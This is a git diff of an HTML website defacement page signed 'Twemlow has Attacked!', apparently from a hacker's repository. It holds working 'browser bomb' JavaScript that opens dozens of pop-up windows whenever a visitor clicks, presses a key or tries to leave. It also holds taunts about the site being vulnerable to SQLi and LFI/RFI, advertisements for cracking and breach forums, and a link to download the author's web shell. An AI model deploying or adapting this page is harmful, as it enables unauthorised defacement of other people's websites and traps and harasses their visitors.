--- a/Twemlow/TwemlowsDefacementPage.html
+++ b/Twemlow/TwemlowsDefacementPage.html
@@ -1,5 +1,5 @@
-<!-- Coded By TwemlowsEmrys -->
-<!--
+<!-- Coded By TwemlowsEmrys
+
 /$$$$$$$$                                       /$$                                         /$$$$$$$$                                           
 |__  $$__/                                      | $$                                        | $$_____/                                           
    | $$    /$$  /$$  /$$  /$$$$$$  /$$$$$$/$$$$ | $$  /$$$$$$  /$$  /$$  /$$  /$$$$$$$      | $$       /$$$$$$/$$$$   /$$$$$$  /$$   /$$  /$$$$$$$
@@ -10,11 +10,26 @@
    |__/    \_____/\___/  \_______/|__/ |__/ |__/|__/ \______/  \_____/\___/ |_______/       |________/|__/ |__/ |__/|__/       \____  $$|_______/
                                                                                                                                /$$  | $$         
                                                                                                                               |  $$$$$$/         
-                                                                                                                               \______/           -->
+                                                                                                                               \______/           
+Member of the following forums:
+
+• https://www.nulled.to/
+
+• https://cracked.to/
+
+• https://raidforums.com/
+
+• https://guardiran.org/ 
+
+• https://www.zone-h.org/ 
+
+Want to download my web shell and defacement page?
+
+• https://github.com/TwemlowsEmrys/Web-Shell-and-Web-Defacement-Page/tree/main/Twemlow -->
 
 <html>
-  <title>| Twemlow has Attacked! |</title>
-  <meta name="description" content=" Twemlows Red Team½° ">
+  <title>- Twemlow has Attacked! </title>
+  <meta name="description" content=" Twemlows Red Team ">
   <script type="text/javascript">
     var msg = document.title;
     var speed = 200;
@@ -35,7 +50,11 @@
    
     moveTitle();
   </script>
-  
+
+  <link rel="stylesheet" href="https://development.guardiran.org/public/official-deface-page/dependencies/css/root.css" type="text/css">
+
+  <div class="overlay"></div>
+
   <body oncontextmenu="procreate(); return false;" onkeydown="procreate(); return false;" onmousedown="procreate(); return false;" bgcolor="white" text="black" onclick="procreate(); return false" onresize="procreate()">
 <script>
 		var xOff = 5;
@@ -49,37 +68,37 @@ function openWindow(url){
 }
 
 function procreate(){
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
+		openWindow('https://i.imgur.com/DoUJsZ7.gif');
 		}
 
 function newXlt(){
@@ -131,18 +150,18 @@ document.onkeydown = function(e) {
              e.keyCode === 87 || 
              e.keyCode === 72 || 
              e.keyCode === 117)) {
-            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+            openWindow('https://i.imgur.com/DoUJsZ7.gif');
+            openWindow('https://i.imgur.com/DoUJsZ7.gif');
+            openWindow('https://i.imgur.com/DoUJsZ7.gif');
+            openWindow('https://i.imgur.com/DoUJsZ7.gif');
+            openWindow('https://i.imgur.com/DoUJsZ7.gif');
+            openWindow('https://i.imgur.com/DoUJsZ7.gif');
+            openWindow('https://i.imgur.com/DoUJsZ7.gif');
+            openWindow('https://i.imgur.com/DoUJsZ7.gif');
+            openWindow('https://i.imgur.com/DoUJsZ7.gif');
+            openWindow('https://i.imgur.com/DoUJsZ7.gif');
+            openWindow('https://i.imgur.com/DoUJsZ7.gif');
+            openWindow('https://i.imgur.com/DoUJsZ7.gif');
             return false;
         } else {
             return true;
@@ -154,9 +173,9 @@ document.onkeydown = keydown;
 function keydown(evt) {
     if (!evt) evt = event;
     if (evt.altKey) {
-        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+        openWindow('https://i.imgur.com/DoUJsZ7.gif');
+        openWindow('https://i.imgur.com/DoUJsZ7.gif');
+        openWindow('https://i.imgur.com/DoUJsZ7.gif');
     }
 }
 
@@ -165,9 +184,9 @@ document.onkeydown = keydown;
 function keydown(e) {
     if (!e) e = event;
     if (e.ctrlKey) {
-        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+        openWindow('https://i.imgur.com/DoUJsZ7.gif');
+        openWindow('https://i.imgur.com/DoUJsZ7.gif');
+        openWindow('https://i.imgur.com/DoUJsZ7.gif');
     }
 }
 
@@ -176,9 +195,9 @@ function keydown(e) {
     window.onbeforeunload = confirmExit;
     function confirmExit() {
         return "are you sure ? ";
-        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
-        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+        openWindow('https://i.imgur.com/DoUJsZ7.gif');
+        openWindow('https://i.imgur.com/DoUJsZ7.gif');
+        openWindow('https://i.imgur.com/DoUJsZ7.gif');
     }
 </script>
 
@@ -565,7 +584,7 @@ function keydown(e) {
       }
     </script>
     <center>
-    <img src="https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892" border="0"width="350px" height="250px"><br>
+    <img src="https://media.giphy.com/media/QWHddGqwjEy9I20352/giphy.gif" border="0"width="350px" height="250px"><br>
   </body>
   <style>
     body { background : #000; font-family : Courier new; text-align : center; color  : #fff; } pre { margin-top: 2%; }
@@ -576,10 +595,22 @@ function keydown(e) {
       <span class="style14">Visit:<a href="http://zone-h.org/" target="_blank"> http://zone-h.org/</a></span></span><span class="style16"><br>
       <span class="style14">Contact me:<a href="https://keybase.io/tw3mlow" target="_blank"> https://keybase.io/tw3mlow</a></span></span><span class="style16"><br>
       <span class="style14">GitHub:<a href="https://github.com/TwemlowsEmrys" target="_blank"> https://github.com/TwemlowsEmrys</a></span></span><span class="style16"><br><br>
-      <span class="style14">This has happened because the admin of this site is incompetent. This website is vulnerable to SQLi, LFI/RFI and incompetence.</span></span><span class="style16"><br>
+      <span class="style14">This has happened because the admin of this site is incompetent.</span></span><span class="style16"><br>
+      <span class="style14">This website is vulnerable to SQLi, LFI/RFI and incompetence.</span></span><span class="style16"><br>
     </p>
     <p align="center" class="style11">
-      <span class="style14"></span><span class="style11"> <strong>I'll be back if you don't patch your security.</strong> <span class="style14"></span></span><span class="style17"> </span>
+  <div id="defacer-info-container">
+    <div id="defacer-info">
+        <span>Hacked By </span>
+        <span class="defacer-name-container" style="margin-left: 20px;">[</span>
+        <marquee id="defacer-name">Twemlows Emrys</marquee>
+        <span class="defacer-name-container">]</span>
+    </div>
+</div>
+
+<div id="phrase-container">
+    <div class="phrases"></div>
+</div>
       <span class="style8">
         </b>
     <p align="center" class="style11">
@@ -723,10 +754,7 @@ function keydown(e) {
       }
     }
   </script>
-<audio controls autoplay>
-  <source src="https://sndup.net/87qh/NEFFEX+-+Cold+[Copyright+Free].mp3" type="audio/ogg">
-</audio>
-  <h4>Twemlows Emrys left their mark :) Sorry about the browser bombing! <a></a></h4><br>
+
   </script><div id=bar style="position: fixed; width: 100%; bottom: 0px;height: 20px; color: darkred; font-size: 13px; left: 0px; border-top: 1px solid #222; padding: 4px; background-color: #222">
   <div><marquee align="left" color="red" scrollamount="5"><font color="yellow" size="4"><b>! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! Twemlows Emrys ! </b></marquee></div></script>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
